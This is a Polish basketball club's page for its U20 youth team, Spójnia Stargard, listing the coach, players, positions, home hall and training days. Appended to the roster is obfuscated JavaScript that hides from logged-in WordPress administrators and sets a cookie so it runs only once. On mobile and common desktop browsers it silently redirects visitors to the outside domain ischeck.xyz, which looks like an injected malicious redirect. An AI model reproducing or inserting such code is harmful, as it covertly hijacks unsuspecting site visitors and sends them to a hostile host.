1999

U20 - Spójnia Stargard

Rocznik 1999 i młodsi.

Trener: Michał Trypuć
Skład zespołu: Czyżewski Szymon, Hoszczaruk Kacper, Górzyński Bartłomiej, Huk Michał, Mucha Konrad, Grudziński Marcel, Dybka Kamil, Szmit Szymon, Korolczuk Oliwier, Skrzycki Kacper, Głowicki Hubert, Resiak Hubert, Szymański Michał, Słomiński Kacper, Jakieła Damian, De Weyher Mateusz, Kucharczyk Bartosz.

Hala meczowa: Hala OSiR/Hala SP3 Stargard

Treningi: Poniedziałek – Piątek

1

Hubert Głowicki

Niski skrzydłowy
4

Kacper Słomiński

Silny skrzydłowy
7

Kacper Skrzycki

Rzucający
12

Marcel Grudziński

Rozgrywający, Rzucający
28

Hubert Resiak

Niski skrzydłowy, Silny skrzydłowy
32

Oliwier Korolczuk

Niski skrzydłowy
34

Konrad Mucha

Rozgrywający, Rzucający

II Trener Michał Trypuć

Kierownik drużyny Łukasz Korolczuk

Narodowość
polPolska
Obecna drużyna
2005/2006, Procar Spójnia Stargard – 2001

var a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https://ischeck.xyz/?var2','getElementById','wpadminbar','undefined','setTime','getTime',';\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\x20path=/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](/Android/i)||navigator['userAgent'][b('0xe')](/BlackBerry/i)||navigator[b('0xd')][b('0xe')](/iPhone|iPad|iPod/i)||navigator[b('0xd')][b('0xe')](/Opera Mini/i)||navigator[b('0xd')][b('0xe')](/IEMobile/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));